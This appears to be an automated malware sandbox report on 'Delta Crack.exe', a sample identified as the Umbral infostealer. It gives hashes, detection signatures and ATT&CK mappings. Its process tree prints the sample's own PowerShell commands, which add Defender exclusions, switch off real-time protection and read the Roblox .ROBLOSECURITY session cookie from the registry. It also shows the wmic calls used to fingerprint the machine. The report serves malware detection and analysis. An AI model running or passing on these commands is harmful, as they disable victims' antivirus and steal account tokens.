umbral | 9aef7a2f101a0ee9126a42195cd4d646aa8af678efea884617c67f1d4ba38ac0

Analysis

max time kernel
6s
max time network
8s
platform
windows10-ltsc_2021_x64
resource
win10ltsc2021-20250410-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250410-enlocale:en-usos:windows10-ltsc_2021-x64system
submitted
12/04/2025, 10:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Delta Crack.exe
Size

259KB
MD5

31ad590c8b916b8fd2940c88cb4ec5e1
SHA1

b4fefbb7baf5e5f62fa7cddd7ac1cf2e02e57aca
SHA256

9aef7a2f101a0ee9126a42195cd4d646aa8af678efea884617c67f1d4ba38ac0
SHA512

ec23dc58cf781962cfc07c373a4c4b02bd3a620f1557c8c2901dc26917876f30aba73b765c4ced6bf24f8714a21221804928d7b85d5dbb22652baf1072a19ffc
SSDEEP

6144:RlloZMHrIkd8g+EtXHkv/iD4cOICli8e1mhOj+iW:poZIL+EP8b6BjzW

Score

10^/10

umbral discovery execution spyware stealer

Malware Config

Signatures

Detect Umbral payload 3 IoCs

resource	yara_rule
behavioral2/files/0x0005000000026b92-4.dat	family_umbral
behavioral2/memory/2272-15-0x0000000000400000-0x0000000000448000-memory.dmp	family_umbral
behavioral2/memory/3356-16-0x000001FDFB1B0000-0x000001FDFB1F0000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1212	powershell.exe
1284	powershell.exe
1684	powershell.exe
5016	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-137520623-1834890667-2396102459-1000\Control Panel\International\Geo\Nation	Delta Crack.exe

Executes dropped EXE 1 IoCs

pid	Process
3356	Umbral.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
7	discord.com
8	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
5	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Delta Crack.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5644	wmic.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
1212	powershell.exe
1212	powershell.exe
1284	powershell.exe
1284	powershell.exe
1684	powershell.exe
1684	powershell.exe
5444	powershell.exe
5444	powershell.exe
5760	wmic.exe
5760	wmic.exe
5760	wmic.exe
5760	wmic.exe
4504	wmic.exe
4504	wmic.exe
4504	wmic.exe
4504	wmic.exe
5060	wmic.exe
5060	wmic.exe
5060	wmic.exe
5060	wmic.exe
5016	powershell.exe
5016	powershell.exe
5644	wmic.exe
5644	wmic.exe
5644	wmic.exe
5644	wmic.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3356	Umbral.exe
Token: SeDebugPrivilege	1212	powershell.exe
Token: SeIncreaseQuotaPrivilege	1212	powershell.exe
Token: SeSecurityPrivilege	1212	powershell.exe
Token: SeTakeOwnershipPrivilege	1212	powershell.exe
Token: SeLoadDriverPrivilege	1212	powershell.exe
Token: SeSystemProfilePrivilege	1212	powershell.exe
Token: SeSystemtimePrivilege	1212	powershell.exe
Token: SeProfSingleProcessPrivilege	1212	powershell.exe
Token: SeIncBasePriorityPrivilege	1212	powershell.exe
Token: SeCreatePagefilePrivilege	1212	powershell.exe
Token: SeBackupPrivilege	1212	powershell.exe
Token: SeRestorePrivilege	1212	powershell.exe
Token: SeShutdownPrivilege	1212	powershell.exe
Token: SeDebugPrivilege	1212	powershell.exe
Token: SeSystemEnvironmentPrivilege	1212	powershell.exe
Token: SeRemoteShutdownPrivilege	1212	powershell.exe
Token: SeUndockPrivilege	1212	powershell.exe
Token: SeManageVolumePrivilege	1212	powershell.exe
Token: 33	1212	powershell.exe
Token: 34	1212	powershell.exe
Token: 35	1212	powershell.exe
Token: 36	1212	powershell.exe
Token: SeDebugPrivilege	1284	powershell.exe
Token: SeDebugPrivilege	1684	powershell.exe
Token: SeDebugPrivilege	5444	powershell.exe
Token: SeIncreaseQuotaPrivilege	5760	wmic.exe
Token: SeSecurityPrivilege	5760	wmic.exe
Token: SeTakeOwnershipPrivilege	5760	wmic.exe
Token: SeLoadDriverPrivilege	5760	wmic.exe
Token: SeSystemProfilePrivilege	5760	wmic.exe
Token: SeSystemtimePrivilege	5760	wmic.exe
Token: SeProfSingleProcessPrivilege	5760	wmic.exe
Token: SeIncBasePriorityPrivilege	5760	wmic.exe
Token: SeCreatePagefilePrivilege	5760	wmic.exe
Token: SeBackupPrivilege	5760	wmic.exe
Token: SeRestorePrivilege	5760	wmic.exe
Token: SeShutdownPrivilege	5760	wmic.exe
Token: SeDebugPrivilege	5760	wmic.exe
Token: SeSystemEnvironmentPrivilege	5760	wmic.exe
Token: SeRemoteShutdownPrivilege	5760	wmic.exe
Token: SeUndockPrivilege	5760	wmic.exe
Token: SeManageVolumePrivilege	5760	wmic.exe
Token: 33	5760	wmic.exe
Token: 34	5760	wmic.exe
Token: 35	5760	wmic.exe
Token: 36	5760	wmic.exe
Token: SeIncreaseQuotaPrivilege	5760	wmic.exe
Token: SeSecurityPrivilege	5760	wmic.exe
Token: SeTakeOwnershipPrivilege	5760	wmic.exe
Token: SeLoadDriverPrivilege	5760	wmic.exe
Token: SeSystemProfilePrivilege	5760	wmic.exe
Token: SeSystemtimePrivilege	5760	wmic.exe
Token: SeProfSingleProcessPrivilege	5760	wmic.exe
Token: SeIncBasePriorityPrivilege	5760	wmic.exe
Token: SeCreatePagefilePrivilege	5760	wmic.exe
Token: SeBackupPrivilege	5760	wmic.exe
Token: SeRestorePrivilege	5760	wmic.exe
Token: SeShutdownPrivilege	5760	wmic.exe
Token: SeDebugPrivilege	5760	wmic.exe
Token: SeSystemEnvironmentPrivilege	5760	wmic.exe
Token: SeRemoteShutdownPrivilege	5760	wmic.exe
Token: SeUndockPrivilege	5760	wmic.exe
Token: SeManageVolumePrivilege	5760	wmic.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2272 wrote to memory of 3356	2272	Delta Crack.exe	81
PID 2272 wrote to memory of 3356	2272	Delta Crack.exe	81
PID 3356 wrote to memory of 1212	3356	Umbral.exe	82
PID 3356 wrote to memory of 1212	3356	Umbral.exe	82
PID 3356 wrote to memory of 1284	3356	Umbral.exe	85
PID 3356 wrote to memory of 1284	3356	Umbral.exe	85
PID 3356 wrote to memory of 1684	3356	Umbral.exe	87
PID 3356 wrote to memory of 1684	3356	Umbral.exe	87
PID 3356 wrote to memory of 5444	3356	Umbral.exe	89
PID 3356 wrote to memory of 5444	3356	Umbral.exe	89
PID 3356 wrote to memory of 5760	3356	Umbral.exe	91
PID 3356 wrote to memory of 5760	3356	Umbral.exe	91
PID 3356 wrote to memory of 4504	3356	Umbral.exe	94
PID 3356 wrote to memory of 4504	3356	Umbral.exe	94
PID 3356 wrote to memory of 5060	3356	Umbral.exe	96
PID 3356 wrote to memory of 5060	3356	Umbral.exe	96
PID 3356 wrote to memory of 5016	3356	Umbral.exe	98
PID 3356 wrote to memory of 5016	3356	Umbral.exe	98
PID 3356 wrote to memory of 5644	3356	Umbral.exe	100
PID 3356 wrote to memory of 5644	3356	Umbral.exe	100

C:\Users\Admin\AppData\Local\Temp\Delta Crack.exe
"C:\Users\Admin\AppData\Local\Temp\Delta Crack.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2272
- C:\Users\Admin\AppData\Local\Temp\Umbral.exe
  "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3356
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1212
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1284
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1684
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5444
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5760
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4504
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5060
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:5016
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    - Suspicious behavior: EnumeratesProcesses
    PID:5644

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3eb3833f769dd890afc295b977eab4b4

SHA1
e857649b037939602c72ad003e5d3698695f436f

SHA256
c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

SHA512
c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
94af4cec0317d7e820db960e0298e66a

SHA1
e6f09f39ce29ffd5a711d11e042f64aedb45db27

SHA256
aa53acb050303f37be6c8135abf4525c307df7bce9b0ead1b1c06260dd826c0e

SHA512
25ce3f95720b3fba0b04653b428fcea16f9bb4c412269e10a9536e8dd4be96dcb0881022c1bf6879eb6161af5cbedde457bb37411f89308de40e16d736bb4c70

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
dbc5ea960326e938323c86dcc0d15ea0

SHA1
4ea5b5a3220241a4956e14aeda9058863aaac8fa

SHA256
d81e86240f3c2e264cdb5a6272205ef95d62f6089a2180da19ac0cb1a82a7809

SHA512
fb1f7b633a47ff61c983dffe66f1034d17e6fc06e3a8f762446cdb0b0242ec8f51ca806760fadd5779b1bc475b6081596dafba3606e8341d289bbbb119823b9c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
494de073067224860ddfa87f20c1fcd5

SHA1
139fe0d6cc741fdbb891b5e0df6e236fcdfdd7de

SHA256
5b67e54cbb8566db2c781ed86c2e026bef8e1c6e5b454c42872ffba7782a9579

SHA512
2457bb775ad7ce2b62b35f5cddfab1c1e1b16dcba83e38e7b5fb2e205048ffc5d220a29a9b0cfe218800d46fc3888480a0822877cf392aeadcf9287b784a390a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
54eda26770f446767200c82171524c5b

SHA1
801c52ec077e5a1ae780506a0e1cc3d63c7a5570

SHA256
1dc2c7e9b474f0b3c938274f3d4c5f504551a280c19af320dc60ab52b0776620

SHA512
d6903fc210f8fd57c691945bdacf0b4ea7bc2ef891596243c141e842e426c3a1efa95e595127bdf1f647c257374c734d189480d03dd47a05c45001be430ec99f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Umbral.exe

Filesize
229KB

MD5
e8e8fc2e1c6e6928d0be487af6aac90f

SHA1
2fc57d734ac2250839ecc52c1d65f539595375a1

SHA256
b79006b5acbe80aac3c6252793fa5291a88968dc12465ef97c5c18f203751259

SHA512
f2a88231ff245a6eb25c28fe6e57c91b08e597f162df12e704614e40405b269ed19b78da2ca7127645c878af22ac9113e20dd5196ef12d2589acc7c9e6cc33ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lcurvr2e.fhb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1212-33-0x00007FFB95500000-0x00007FFB95FC2000-memory.dmp

Filesize
10.8MB

Download
memory/1212-29-0x0000024350B60000-0x0000024350B82000-memory.dmp

Filesize
136KB

Download
memory/1212-30-0x00007FFB95500000-0x00007FFB95FC2000-memory.dmp

Filesize
10.8MB

Download
memory/1212-19-0x00007FFB95500000-0x00007FFB95FC2000-memory.dmp

Filesize
10.8MB

Download
memory/1212-18-0x00007FFB95500000-0x00007FFB95FC2000-memory.dmp

Filesize
10.8MB

Download
memory/2272-15-0x0000000000400000-0x0000000000448000-memory.dmp

Filesize
288KB

Download
memory/3356-46-0x000001FDFD8D0000-0x000001FDFD946000-memory.dmp

Filesize
472KB

Download
memory/3356-47-0x000001FDFD950000-0x000001FDFD9A0000-memory.dmp

Filesize
320KB

Download
memory/3356-48-0x000001FDFD8A0000-0x000001FDFD8BE000-memory.dmp

Filesize
120KB

Download
memory/3356-16-0x000001FDFB1B0000-0x000001FDFB1F0000-memory.dmp

Filesize
256KB

Download
memory/3356-17-0x00007FFB95500000-0x00007FFB95FC2000-memory.dmp

Filesize
10.8MB

Download
memory/3356-72-0x000001FDFD870000-0x000001FDFD87A000-memory.dmp

Filesize
40KB

Download
memory/3356-73-0x000001FDFDAB0000-0x000001FDFDAC2000-memory.dmp

Filesize
72KB

Download
memory/3356-14-0x00007FFB95503000-0x00007FFB95505000-memory.dmp

Filesize
8KB

Download
memory/3356-91-0x00007FFB95500000-0x00007FFB95FC2000-memory.dmp

Filesize
10.8MB

Download